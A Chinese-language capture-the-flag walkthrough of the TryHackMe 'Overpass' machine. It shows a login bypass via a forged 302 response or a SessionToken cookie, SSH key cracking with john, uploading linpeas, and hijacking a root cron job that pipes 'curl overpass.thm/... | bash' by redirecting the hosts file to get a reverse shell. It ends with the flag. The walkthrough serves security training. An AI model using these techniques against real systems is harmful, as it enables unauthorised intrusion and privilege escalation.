Overpass

感觉不如box…网速

真快啊

太快了吧,哥们

去登录页面看看,发现login.js的校验就是从后端收到某个指定的字符,来判断是否合法,这里直接用burp的拦截功能,在返回incorrect的时候把数据包改成

HTTP/1.1 302 FOUND
Date: Mon, 20 Jul 2020 14:33:13 GMT
Content-Length: 21
Content-Type: text/plain; charset=utf-8
Connection: close
location: /admin

重定向到admin就成功了
也可以直接设置Cookiedocument.cookie="SessionToken=pleaselogmein"

把密钥导出hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt
爆破得到james13是密码
ssh -i key james@10.10.186.149

把linpeas.sh传上去
scp -i key linpeas.sh james@10.10.186.149:~/linpeas.sh

james@overpass-prod:/home$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

看这个可疑的curl
直接修改hosts文件,指向我们的机子
反弹shell启动!

thm{7f336f8c359dbac18d54fdd64ea753bb}

太曲折了,emmmm
最后是用他的box开的代理.chisel直接连过去,说:谢谢thm